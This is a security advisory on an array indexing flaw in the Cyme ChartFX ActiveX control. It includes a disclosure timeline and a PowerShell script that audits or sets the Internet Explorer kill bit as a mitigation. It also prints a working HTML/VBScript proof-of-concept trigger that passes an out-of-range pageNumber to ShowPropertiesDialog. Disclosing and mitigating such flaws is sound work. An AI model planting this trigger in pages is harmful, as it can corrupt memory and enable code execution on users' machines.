Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability

Summary

The Cyme ChartFX Client Server ActiveX Control suffers from an array indexing vulnerability.

Credit:

The information has been provided by Francis Provencher.


Details

Vulnerable Systems:
 * CYME version 5.0.12.663.

The vulnerability is caused by an indexing error in the ‘ShowPropertiesDialog()’ method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be exploited to write a single byte value to an arbitrary memory location via the ‘pageNumber’ parameter. Successful exploitation may allow execution of arbitrary code.

The Code

<object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' />
<script language='vbscript'>
' Control metadata recorded with the test case
targetFile = "C:CYMECYMDIST50TRIALChartFX.ClientServer.Core.dll"
prototype = "Sub ShowPropertiesDialog ( ByVal context As Variant , ByVal pageNumber As Long )"
memberName = "ShowPropertiesDialog"
progid = "Cfx62ClientServer.Chart"
argCount = 2

arg1 = "defaultV"
' pageNumber is set to the largest signed 32-bit value
arg2 = 2147483647

target.ShowPropertiesDialog arg1, arg2
</script>

Disclosure Timeline:
2012-03-14 Vulnerability reported to Secunia
2012-10-03 Publication of this advisory (180 Days)
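
On hosts where the control is installed, Internet Explorer can be prevented from instantiating it by setting the kill bit for the CLSID shown in the code above. The following PowerShell is an added example, not part of the original advisory or any vendor guidance; the function name Set-ActiveXKillBit and its -AuditOnly switch are hypothetical, and the script assumes an elevated session.

```powershell
# Added example (not from the advisory): audit or set the IE kill bit for the
# ChartFX control. Run from an elevated PowerShell session.
$Clsid   = '{E9DF30CA-4B30-4235-BF0C-7150F646606C}'  # CLSID from the advisory's <object> tag
$KillBit = 0x400                                      # "Compatibility Flags" kill-bit value
$Roots   = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
if ([Environment]::Is64BitOperatingSystem) {
    # 32-bit Internet Explorer on 64-bit Windows reads the WOW6432Node view
    $Roots += 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
}

function Set-ActiveXKillBit {   # hypothetical helper name
    param(
        [Parameter(Mandatory)] [string] $Root,
        [Parameter(Mandatory)] [string] $Clsid,
        [switch] $AuditOnly     # report only, change nothing
    )
    $key     = Join-Path $Root $Clsid
    $name    = 'Compatibility Flags'
    $current = 0
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -Name $name -ErrorAction SilentlyContinue
        if ($prop) { $current = [int]$prop.$name }
    }
    $isSet = ($current -band $KillBit) -ne 0
    if (-not $isSet -and -not $AuditOnly) {
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        # Preserve any other compatibility flags already present
        New-ItemProperty -LiteralPath $key -Name $name -PropertyType DWord `
            -Value ($current -bor $KillBit) -Force | Out-Null
        $isSet = $true
    }
    [pscustomobject]@{ Key = $key; KillBitSet = $isSet }
}

# Audit first, then apply
$Roots | ForEach-Object { Set-ActiveXKillBit -Root $_ -Clsid $Clsid -AuditOnly }
$Roots | ForEach-Object { Set-ActiveXKillBit -Root $_ -Clsid $Clsid }
```

The kill bit only stops Internet Explorer and other hosts that honor it from loading the control; the indexing error in ChartFX.ClientServer.Core.dll itself remains until the component is updated or removed.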
